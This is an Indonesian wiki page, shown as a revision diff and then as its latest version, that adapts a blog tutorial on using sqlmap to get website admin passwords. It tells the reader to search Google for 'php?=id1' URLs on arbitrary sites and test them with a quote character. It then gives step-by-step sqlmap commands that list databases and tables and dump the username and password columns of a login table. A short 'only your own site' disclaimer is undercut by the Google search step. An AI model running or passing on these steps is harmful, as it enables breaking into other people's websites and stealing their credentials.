Sqlmap: memperoleh password database sql: Difference between revisions

From OnnoCenterWiki
Jump to navigationJump to search
Onnowpurbo (talk | contribs)
69,477 edits
Onnowpurbo (talk | contribs)
69,477 edits
New page: Sumber: http://uwnthesis.wordpress.com/2014/02/01/kali-linux-how-to-hack-use-sqlmap-for-auto-sql-injection-find-website-admin-password/ Kali Linux How To Use SQLmap for SQL Injection –...
 
Onnowpurbo (talk | contribs)
69,477 edits
No edit summary
 
(3 intermediate revisions by the same user not shown)
Line 2: Line 2:




Kali Linux How To Use SQLmap for SQL Injection – Find Website Admin Password
Berikut adalah cara memperoleh password, termasuk password admin sebuah situs web. Lakukan ini ke web anda sendiri, agar tidak melanggar hukum.
01/02/2014


How to test if a website is vulnerable to SQL injection.  To be legal, use your own website.
Step 1 – Google for php?=id1


Google for php?=id1
==Step 1 – Google search php?=id1==


add a Single quote… to the end of the URL.
Cari di Google, keyword
so it reads php?=id1′
If you get an error the website is vulnerable.  Go to step 2.
If this is your own website – shut it down immediately.  You need to secure it before you bring it back online.


******
php?=id1
Step 2 – Kali SQLMAP – get website databases
SQLMAP  – u http:\\website.com/page.php?id=1 –dbs
This will fetch all available databases on the website.  Did you see them listed?


******
Jika sudah dapat URL-nya dari Google,
Step 3 – Find the LOGIN table
Tambahkan sebuah quote di akhir URL-nya sehingga menjadi
SQLMAP  – u http:\\website.com/page.php?id=1 –D www – tables


Did you see all the TABLES on the website list out?
http://alamatweb.com/index.php?=id1′


Look for likely targets… eg Login, username or password table.
Jika anda memperoleh error maka situs tersebut vurnerable / ada kelemahan & dapat di serang. Jika situs tersebut adalah situs anda sendiri maka sebaiknya dimatikan secepatnya, amankan baru nyalakan kembali.


If you’re not on your own website, or a best friends website (who’s sat next to you), you are into illegal terrority. STOP now!!
==Step 2 – Kali SQLMAP – dapatkan website database==


******
sqlmap –u http:\\website.com/page.php?id=1 --dbs
Step 4 – Get all the Login Data (from Step 3)
SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login –columns


This should display columns with items such as Cookie, ID, IP, Password, Username.
Ambil semua database yang tersedia di web.


******
==Step 3 Cari tabel LOGIN==
Step 5 Get Usernames (& Admin)
SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C username –dump
Look for “admin”


*****
sqlmap –u http:\\website.com/page.php?id=1 -D www --tables
Step 6 – Get Passwords (of Admin)
SQLMAP  – u http:\\website.com/page.php?id=1 –D www -T uk_cms_gb_login -C password –dump


That’s it.
Cari target seperti, tabel login, username atau password.
 
==Step 4 – Dapatkan semua login data==
 
sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login --columns
 
Tabel ini akan menampilkan kolom, seperti Cookie, ID, IP, Password, Username.
 
==Step 5 – Dapatkan Username (& Admin)==
 
sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C username --dump
 
Cari “admin”




==Step 6 – Dapatkan Password (dari Admin)==


sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C password --dump


That’s it.




Line 55: Line 53:


* http://uwnthesis.wordpress.com/2014/02/01/kali-linux-how-to-hack-use-sqlmap-for-auto-sql-injection-find-website-admin-password/
* http://uwnthesis.wordpress.com/2014/02/01/kali-linux-how-to-hack-use-sqlmap-for-auto-sql-injection-find-website-admin-password/
* http://oldmanlab.blogspot.sg/2012/03/sqlmap-tutorial-you-are-just.html

Latest revision as of 00:34, 14 November 2014

Sumber: http://uwnthesis.wordpress.com/2014/02/01/kali-linux-how-to-hack-use-sqlmap-for-auto-sql-injection-find-website-admin-password/


Berikut adalah cara memperoleh password, termasuk password admin sebuah situs web. Lakukan ini ke web anda sendiri, agar tidak melanggar hukum.


Step 1 – Google search php?=id1

Cari di Google, keyword 

php?=id1

Jika sudah dapat URL-nya dari Google, Tambahkan sebuah quote di akhir URL-nya sehingga menjadi 

http://alamatweb.com/index.php?=id1′

Jika anda memperoleh error maka situs tersebut vurnerable / ada kelemahan & dapat di serang. Jika situs tersebut adalah situs anda sendiri maka sebaiknya dimatikan secepatnya, amankan baru nyalakan kembali.

Step 2 – Kali SQLMAP – dapatkan website database

sqlmap –u http:\\website.com/page.php?id=1 --dbs

Ambil semua database yang tersedia di web.

Step 3 – Cari tabel LOGIN

sqlmap –u http:\\website.com/page.php?id=1 -D www --tables

Cari target seperti, tabel login, username atau password.

Step 4 – Dapatkan semua login data

sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login --columns

Tabel ini akan menampilkan kolom, seperti Cookie, ID, IP, Password, Username.

Step 5 – Dapatkan Username (& Admin)

sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C username --dump

Cari “admin”


Step 6 – Dapatkan Password (dari Admin)

sqlmap –u http:\\website.com/page.php?id=1 -D www -T uk_cms_gb_login -C password --dump

That’s it.


Referensi

Retrieved from "https://lms.onnocenter.or.id/wiki/index.php?title=Sqlmap:_memperoleh_password_database_sql&oldid=41322"